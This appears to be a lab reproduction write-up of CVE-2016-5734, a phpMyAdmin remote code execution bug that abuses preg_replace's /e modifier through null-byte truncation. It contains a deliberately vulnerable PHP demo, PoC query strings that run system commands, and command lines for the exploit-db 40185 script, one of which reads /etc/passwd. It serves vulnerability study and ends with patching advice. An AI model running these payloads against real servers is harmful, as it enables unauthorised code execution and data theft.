CVE-2016-5734 Phpmyadmin background code execution vulnerability reproduction

---

Vulnerability description

  CVE-2016-5734 on the exploit-db is phpMyAdmin 4.6.2-Authenticated Remote Code Execution, which means the remote code execution of phpMyAdmin authenticated users. According to the description, all 4.6.x versions of phpMyAdmin affected (until 4.6.3) ), version 4.4.x (up to 4.4.15.7), and version 4.0.x (up to 4.0.10.16). The author of CVE used the preg_replace function in the version before php 5.4.7 to handle the bug of the null byte error, so that the injected code can be executed remotely.

Impact version

• phpmyadmin 4.6.x version (up to 4.6.3)
• phpmyadmin 4.4.x version (up to 4.4.15.7)
• phpmyadmin 4.0.x version (up to 4.0.10.16)
• PHP version: 4.3.0 ~5.4.6
  
  

Vulnerability environment construction

Use vulhub to directly docker start the environment with one key CVE-2018-12613 environment

Docker quick start and vulnerability environment construction

After downloading and installing vulhub, enter the /vulhub/phpmyadmin/CVE-2016-5734directory and execute the following command to start the environment

sudo docker-compose up -d

After the installation is successful, check the port and find that the port is mapped on our 8080 port.

Visit localhost:8080 in the virtual machine, and the following interface appears, indicating that the installation is successful

Vulnerability analysis

• Let ’s talk about the preg_replace function first : The
  preg_replace function performs a regular expression search and replacement.

• Let me talk about the role of preg_replace \e :
  if this deprecated modifier is set, preg_replace() will perform the replacement string as a php code evaluation after performing a backreference replacement to the replacement string (eval function method) , and use the execution result as the string actually involved in the replacement. Single quotes, double quotes, backslashes () and NULL characters will be escaped with backslashes when replacing backquotes.

Test the use \eof code execution:

<?php
    highlight_file(__FILE__);
    $raw = $_GET['raw'];
    $replace = $_GET['replace'];
    $text = $_GET['text'];

    $text = preg_replace('/'.$raw.'/e', $replace, $text);
?>

poc

?raw=a&replace=system("ls")&text=larry

If our demo becomes the following code, will there be loopholes?

<?php
    highlight_file(__FILE__);
    $raw = $_GET['raw'];
    $replace = $_GET['replace'];
    $text = $_GET['text'];

    $text = preg_replace('/'.$raw.'/i', $replace, $text);
?>

In fact, it can be bypassed. When the php version is less than 5.4.7, inject a null character into the pattern to cause truncation, and pass in the e modifier, which can be executed according to the php code.

poc

?raw=a/e%00&replace=system(%22ls%22)&text=larry

For phpmyadmin code vulnerability analysis, you can view the following article:
https://xz.aliyun.com/t/7836#toc-5

Exploit

Conditions of use: need to know the database account password

Download the exploit script:
https://www.exploit-db.com/exploits/40185

Script utilization method:

-u account
-p password
-c code execution (php code) uname -a is executed by default

python 40185.py -u root -p root http://192.168.154.3:8080

python 40185.py -u root -p root -c "system('cat /etc/passwd')" http://192.168.154.3:8080

Vulnerability hardening

Update php or phpmyadmin

Reference link

https://larry.ngrep.me/2016/09/21/cve-2016-5734-analysis/
https://xz.aliyun.com/t/7836